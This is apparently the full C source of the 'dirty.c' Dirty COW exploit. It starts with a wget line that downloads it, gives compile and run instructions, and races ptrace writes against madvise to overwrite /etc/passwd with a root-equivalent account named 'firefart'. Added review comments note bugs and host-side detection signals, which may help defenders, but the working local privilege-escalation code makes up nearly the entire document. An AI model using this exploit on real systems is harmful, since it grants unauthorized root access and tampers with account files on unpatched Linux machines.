  1. wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
  2.  
  3. // This exploit uses the pokemon exploit of the dirtycow vulnerability
  4. // as a base and automatically generates a new passwd line.
  5. // The user will be prompted for the new password when the binary is run.
  6. // The original /etc/passwd file is then backed up to /tmp/passwd.bak,
  7. // and the root account's line is overwritten with the generated one.
  8. // After running the exploit you should be able to login with the newly
  9. // created user.
  10. //
  11. // To use this exploit modify the user values according to your needs.
  12. // The default is "firefart".
  13. //
  14. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
  15. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
  16. //
  17. // Compile with:
  18. // gcc -pthread dirty.c -o dirty -lcrypt
  19. //
  20. // chmod +x dirty
  21. //
  22. // Then run the newly created binary by either doing:
  23. // "./dirty" or "./dirty my-new-password"
  24. //
  25. // Afterwards, you can either "su firefart" or "ssh firefart@..."
  26. //
  27. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
  28. // mv /tmp/passwd.bak /etc/passwd
  29. //
  30. // Exploit adopted by Christian "FireFart" Mehlmauer
  31. // https://firefart.at
  32. //
  33.  
  34. #include <fcntl.h>
  35. #include <pthread.h>
  36. #include <string.h>
  37. #include <stdio.h>
  38. #include <stdint.h>
  39. #include <sys/mman.h>
  40. #include <sys/types.h>
  41. #include <sys/stat.h>
  42. #include <sys/wait.h>
  43. #include <sys/ptrace.h>
  44. #include <stdlib.h>
  45. #include <unistd.h>
  46. #include <crypt.h>
  47.  
// Target file, the path copy_file() backs it up to before anything is
// modified, and the fixed crypt() salt. A fixed salt means equal passwords
// produce equal hashes; the hash is printed on stdout by main() anyway.
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

// Process-wide state shared between main(), the forked child and madviseThread().
int f;           // descriptor from open(filename, O_RDONLY) in main()
void *map;       // PROT_READ, MAP_PRIVATE mapping of filename; target of both
                 // madviseThread() and the PTRACE_POKETEXT loop in main()
pid_t pid;       // fork() result: child pid in the parent, 0 in the child
pthread_t pth;   // madviseThread() handle, created and joined only in the child
struct stat st;  // fstat() of f; st.st_size sizes the mapping
  57.  
// One passwd(5) entry. generate_passwd_line() renders the fields in this
// order as "name:hash:uid:gid:info:home:shell". Every pointer is expected to
// reference a NUL-terminated string (main() uses literals plus crypt() output).
struct Userinfo {
    char *username;
    char *hash;       // crypt() output from generate_password_hash()
    int user_id;
    int group_id;
    char *info;       // the passwd comment field (commonly called GECOS)
    char *home_dir;
    char *shell;
};
  67.  
/*
 * Hash plaintext_pw with the traditional crypt() API using the file-wide
 * fixed salt. The returned pointer is crypt()'s static buffer, not owned by
 * the caller and overwritten by the next crypt() call; it is NULL when
 * crypt() fails.
 */
char *generate_password_hash(char *plaintext_pw) {
    char *digest = crypt(plaintext_pw, salt);
    return digest;
}
  71.  
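/*
 * Render u as one passwd(5) line, "name:hash:uid:gid:info:home:shell\n".
 *
 * Returns a malloc'd, NUL-terminated string the caller owns (free() it), or
 * NULL when a string field is NULL, snprintf() reports an error, or the
 * allocation fails. The original called sprintf() into an unchecked
 * malloc() result; it also formatted u.hash with %s although crypt(), which
 * produces it, can return NULL.
 */
char *generate_passwd_line(struct Userinfo u) {
    const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
    // %s with a NULL argument is undefined behavior; refuse instead.
    if (u.username == NULL || u.hash == NULL || u.info == NULL ||
        u.home_dir == NULL || u.shell == NULL) {
        return NULL;
    }
    // First pass only measures the output; a negative result is an error.
    int size = snprintf(NULL, 0, format, u.username, u.hash,
                        u.user_id, u.group_id, u.info, u.home_dir, u.shell);
    if (size < 0) {
        return NULL;
    }
    size_t len = (size_t)size + 1;  // room for the terminating NUL
    char *ret = malloc(len);
    if (ret == NULL) {
        return NULL;
    }
    // Bounded second pass; len was sized from the same format and arguments.
    snprintf(ret, len, format, u.username, u.hash, u.user_id,
             u.group_id, u.info, u.home_dir, u.shell);
    return ret;
}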
  81.  
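/*
 * Thread body started by the child in main(): calls
 * madvise(MADV_DONTNEED) on the first 100 bytes of the global mapping
 * 200,000,000 times, summing the return values (0 per success, -1 per
 * failure) into c, which is printed when the loop finishes. A process
 * spinning on madvise(MADV_DONTNEED) like this is one of the host-side
 * signals of this program.
 *
 * arg is unused (pthread_create() passes NULL). Returns NULL; the original
 * fell off the end of a non-void function, which is undefined behavior once
 * pthread_join() consumes the (missing) return value.
 */
void *madviseThread(void *arg) {
    (void)arg;
    int c = 0;
    for (int i = 0; i < 200000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
    return NULL;
}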
  89.  
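/*
 * Copy the file at `from` to a new file at `to`, refusing to overwrite.
 *
 * Returns 0 on success and -1 if `to` already exists, either file cannot be
 * opened, or a read/write/close error occurs. Only the "already exists" case
 * is reported on stdout, as in the original; the success message is printed
 * only when the whole copy was written and flushed.
 *
 * Fixes relative to the original: the byte was read into a `char`, so the
 * comparison with EOF either stopped the copy at the first 0xFF byte (signed
 * char) or never terminated (unsigned char) -- it is now an int. The target
 * is opened with "x" so a file created between the access() check and
 * fopen() is not truncated. Write and close errors are checked, because a
 * silently truncated backup defeats its purpose.
 */
int copy_file(const char *from, const char *to) {
    // check if target file already exists
    if (access(to, F_OK) != -1) {
        printf("File %s already exists! Please delete it and run again\n",
               to);
        return -1;
    }

    FILE *source = fopen(from, "rb");
    if (source == NULL) {
        return -1;
    }
    // "x": fail instead of truncating if `to` appeared after the check above.
    FILE *target = fopen(to, "wbx");
    if (target == NULL) {
        fclose(source);
        return -1;
    }

    int rc = 0;
    int ch;  // int, not char: fgetc() returns EOF out of band of byte values
    while ((ch = fgetc(source)) != EOF) {
        if (fputc(ch, target) == EOF) {
            rc = -1;
            break;
        }
    }
    // EOF is also returned on a read error; distinguish it from end of file.
    if (ferror(source)) {
        rc = -1;
    }

    fclose(source);
    // fclose() flushes buffered output; a failure here means the copy is incomplete.
    if (fclose(target) != 0) {
        rc = -1;
    }

    if (rc == 0) {
        printf("%s successfully backed up to %s\n",
               from, to);
    }
    return rc;
}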
  123.  
/*
 * Entry point. Order of operations, as written:
 *   1. copy_file() backs filename up to backup_filename (exits if that fails).
 *   2. Build the replacement passwd(5) line for a uid/gid-0 user, with the
 *      password from argv[1] or an interactive getpass() prompt.
 *   3. mmap() filename read-only and MAP_PRIVATE, fork(), and let the parent
 *      ptrace(PTRACE_POKETEXT) the line into the mapping while the child's
 *      madviseThread() keeps calling madvise(MADV_DONTNEED) on it.
 *
 * Host-side observables of this program, for detection: a process that maps
 * /etc/passwd MAP_PRIVATE, forks, and issues PTRACE_POKETEXT against its own
 * child in a tight loop while the child spins on madvise(MADV_DONTNEED);
 * plus the backup file it leaves behind at backup_filename.
 *
 * NOTE(review): the return values of open()/fstat()/mmap()/fork()/
 * pthread_create()/ptrace() are not checked; after a failed open() f is -1,
 * fstat() fails and mmap() returns MAP_FAILED, which is then used as-is.
 */
int main(int argc, char *argv[])
{
    // backup file
    // copy_file() returns -1 for every failure; exit(-1) reaches the shell as status 255.
    int ret = copy_file(filename, backup_filename);
    if (ret != 0) {
        exit(ret);
    }

    struct Userinfo user;
    // set values, change as needed
    // uid/gid 0: the generated line describes a root-equivalent account.
    user.username = "firefart";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "pwned";
    user.home_dir = "/root";
    user.shell = "/bin/bash";

    char *plaintext_pw;

    if (argc >= 2) {
        // A password given as an argument is echoed here and, like any argv
        // value, is typically readable by other local users via the process list.
        plaintext_pw = argv[1];
        printf("Please enter the new password: %s\n", plaintext_pw);
    } else {
        plaintext_pw = getpass("Please enter the new password: ");
    }

    // NOTE(review): crypt() (via generate_password_hash) can return NULL on
    // failure; that is not checked before the hash is formatted with %s.
    user.hash = generate_password_hash(plaintext_pw);
    char *complete_passwd_line = generate_passwd_line(user);
    printf("Complete line:\n%s\n", complete_passwd_line);

    // Read-only private mapping of the target file. The extra sizeof(long)
    // is presumably so the last long-sized poke below stays inside the mapping.
    f = open(filename, O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL,
               st.st_size + sizeof(long),
               PROT_READ,
               MAP_PRIVATE,
               f,
               0);
    printf("mmap: %lx\n",(unsigned long)map);
    pid = fork();
    if(pid) {
        // Parent: waitpid() returns once the traced child has stopped itself
        // (SIGSTOP below). Then write the new line into the mapping one long
        // at a time, at every byte offset of the line, 10000 times per offset.
        waitpid(pid, NULL, 0);
        int u, i, o, c = 0;
        int l=strlen(complete_passwd_line);  // size_t narrowed to int
        for(i = 0; i < 10000/l; i++) {
            for(o = 0; o < l; o++) {
                for(u = 0; u < 10000; u++) {
                    // NOTE(review): this reads sizeof(long) bytes starting at
                    // complete_passwd_line + o, so for the last offsets it
                    // reads past the malloc'd buffer (heap over-read), and the
                    // load may be unaligned. map + o is void* arithmetic (GCC
                    // extension).
                    c += ptrace(PTRACE_POKETEXT,
                                pid,
                                map + o,
                                *((long*)(complete_passwd_line + o)));
                }
            }
        }
        // c sums ptrace() results: 0 per success, -1 per failed poke.
        printf("ptrace %d\n",c);
    }
    else {
        // Child: start the madvise loop, make itself traceable by the parent
        // and stop, which releases the parent's waitpid() above.
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        pthread_join(pth,NULL);
    }

    // Both parent and child fall through to here after their branch.
    printf("Done! Check %s to see if the new user was created.\n", filename);
    printf("You can log in with the username '%s' and the password '%s'.\n\n",
           user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
           backup_filename, filename);
    return 0;
}